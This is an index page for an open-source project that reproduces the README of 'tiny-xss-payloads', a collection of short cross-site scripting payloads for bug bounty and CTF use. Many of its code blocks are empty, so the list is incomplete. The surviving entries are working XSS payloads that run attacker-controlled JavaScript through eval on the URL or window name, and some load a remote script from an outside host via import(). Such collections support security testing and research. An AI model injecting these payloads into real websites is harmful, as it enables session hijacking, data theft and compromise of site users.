Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/terjanq/tiny-xss-payloads

A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me
https://github.com/terjanq/tiny-xss-payloads

bugbounty ctf html javascript payloads xss

Last synced: 5 days ago
JSON representation

A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me

Awesome Lists containing this project

README 

        
# Tiny-XSS-Payloads

A collection of short XSS payloads that can be used in different contexts.



The DEMO available here: 



## Current Payloads



```html



```



```html



```



```html



```



```html



```



```html



```



```html



```



```html





```



```html



```



```html



```



```html



```



```html



```



```html



">

```



```html



```



```html



">

```



```html



```



```html

<!-- If inline styles are allowed and the URL can be controlled -->

<style/onload=eval(`'`+URL)>

```



```html

<!-- If inline styles are blocked -->

<style/onerror=eval(name)>

```



```html

<!-- Uses external script as import, doesn't work in innerHTML -->

<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->

<svg/onload=import(/\\NJ.₨/)>

```



```html

<!-- Uses external script as import,  triggers if inline styles are allowed.

<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->

<style/onload=import(/\\NJ.₨/)>

```



```html

<!-- Uses external script as import -->

<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->

<iframe/onload=import(/\\NJ.₨/)>

```



Deprecated:



```html

<!-- If you control the URL, Safari-only -->

<iframe/onload=write(URL)>

```



```html

<!-- If inline styles are allowed, Safari only -->

<style/onload=write(URL)>

```